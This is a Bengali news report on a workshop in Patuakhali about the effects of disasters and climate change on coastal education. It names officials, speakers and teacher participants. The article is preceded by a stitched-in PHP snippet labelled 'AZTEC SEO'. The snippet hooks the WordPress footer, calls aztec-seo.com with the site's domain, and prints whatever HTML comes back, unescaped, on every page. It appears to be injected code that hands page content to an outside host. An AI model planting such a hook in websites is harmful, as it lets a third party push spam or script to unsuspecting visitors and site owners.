/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
পটুয়াখালীতে উপকূলীয় অঞ্চলে শিক্ষা ক্ষেত্রে দুর্যোগ ও জলবায়ু পরিবর্তনের প্রভাব ও করণীয় বিষয়ক কর্মশালা অনুষ্ঠিত হয়েছে।
২২ ডিসেম্বর বৃহষ্পতিবার সকাল ১০টায় পিটিআই রোডস্থ এসডিএ এর প্রশিক্ষণ হলে গণস্বাক্ষরতা অভিযান বাংলাদেশের অর্থায়নে ও বাস্তবায়ন সংস্থা এসডিএ এর নির্বাহী পরিচালক কে এম এনায়েত হোসেনের সভাপতিত্বে ও প্রজেক্ট ম্যানেজার শামীমা নাসরীনের সঞ্চালনায় উপকূলীয় শিক্ষা ক্ষেত্রে দুর্যোগ ও জলবায়ু পরিবর্তনের প্রভাব ও করণীয় বিষয়ক কর্মশালায় প্রধান অতিথি হিসাবে কর্মশালার উদ্বোধন করেন পটুয়াখালী সদর উপজেলা নির্বাহী অফিসার মোঃ সাইফুর রহমান।
বিশেষ অতিথি হিসাবে বক্তব্য রাখেন জেলা শিক্ষা অফিসার মোল্লা বখতিয়ার উদ্দিন, জেলা শিক্ষা অফিসের সহকারী পরিদর্শক মংফুন ওয়েন, জেলা সমাজসেবা অফিসার (রেজিঃ) মোঃ মাহাবুবুর রহমান, বিশিষ্ট সমাজসেবক শ.ম. দেলোয়ার হোসেন দিলিপ। আরো বক্তব্য রাখেন সাংবাদিক জালাল আহমেদ,শেরে বাংলা বালিকা বিদ্যালয়ের প্রধান শিক্ষক রাহিমা মিনি, লাউকাঠী শহীদ স্মৃতি বিদ্যানিকেতনের প্রধান শিক্ষক মনিন্দ্র দত্ত, ব্র্যাক জেলা সমন্বয়কারী নেফাজ উদ্দিন, কোডেক এর সিনিয়র জোনাল ম্যানেজার মু. মুজতাহিদুর রহমান, রবিউল আমিন, কর্মশালায় দুর্যোগ ও জলবায়ু পরিবর্তনের প্রভাব ও করণীয় বিষয়ক মূল প্রবন্ধ উপস্থাপন করেন পটুয়াখালী বিজ্ঞান ও প্রযুক্তি বিশ্ববিদ্যালয়ের পরিবেশ বিজ্ঞান ও দুর্যোগ ব্যবস্থানা অনুষদের সহকারী অধ্যাপক মোঃ তরিকুল ইসলাম।
কর্মশালায় বিভিন্ন শিক্ষাপ্রতিষ্ঠান, এনজিওর ৫৫ জন প্রধান শিক্ষক ও সহকারী শিক্ষক প্রতিনিধি।